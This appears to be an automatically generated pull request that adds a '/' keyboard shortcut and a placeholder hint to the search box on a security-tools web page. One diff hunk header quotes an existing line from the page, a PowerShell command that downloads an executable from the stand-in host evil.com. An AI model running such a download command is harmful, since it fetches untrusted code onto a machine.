### PR TITLE
🎨 Palette: Add keyboard shortcut for search in tools

### DIFF
--- a/.Jules/palette.md
+++ b/.Jules/palette.md
@@ -5,3 +5,7 @@
 ## 2024-05-24 - Dynamic Category Management in Search
 **Learning:** When filtering categorized lists (like on `resources.html`), hiding items without hiding their parent category headers leaves "ghost" headers that clutter the UI.
 **Action:** Always implement logic to check if a category is empty after filtering and hide the category header accordingly.
+
+## 2026-02-14 - Keyboard Shortcut Discoverability
+**Learning:** Adding keyboard shortcuts (like '/' for search) significantly improves power-user experience, but they are useless if invisible. Updating the placeholder text to include the shortcut (e.g., "Press '/'") is a simple, zero-layout-shift way to boost discoverability.
+**Action:** Always pair keyboard shortcuts with a visual indicator, such as a tooltip or placeholder text, to ensure users know they exist.

--- a/tools.html
+++ b/tools.html
@@ -21,7 +21,7 @@
     <div class="search-container">
         <div class="search-wrapper">
             <label for="searchInput" class="sr-only">Search Security Tools</label>
-            <input type="text" id="searchInput" class="search-input" placeholder="Search tools, categories, or keywords..." aria-label="Search Security Tools">
+            <input type="text" id="searchInput" class="search-input" placeholder="Search tools, categories, or keywords... (Press '/')" aria-label="Search Security Tools">
             <button id="clearSearch" class="clear-button hidden" aria-label="Clear search" type="button">✕</button>
         </div>
     </div>
@@ -413,6 +413,14 @@ Invoke-WebRequest -Uri "http://evil.com/file.exe" -OutFile "C:\Temp\file.exe"
         searchInput.value = '';
         filterTools('');
         searchInput.focus();
+    });
+
+    // Keyboard shortcut for search
+    document.addEventListener('keydown', (e) => {
+        if (e.key === '/' && document.activeElement !== searchInput) {
+            e.preventDefault();
+            searchInput.focus();
+        }
     });
   </script>
 </body>


### PR DESCRIPTION
💡 What: Added '/' keyboard shortcut to focus the search input in tools.html, and updated the placeholder text to include "(Press '/')".
🎯 Why: Power users often rely on keyboard navigation. This standard shortcut improves efficiency and accessibility for quick searches.
📸 Before/After: Placeholder updated to include the hint.
♿ Accessibility: Provides an alternative way to access search without mouse/touch.

---
*PR created automatically by Jules for task [10880505643612749382](https://jules.google.com/task/10880505643612749382) started by @PietjePuh*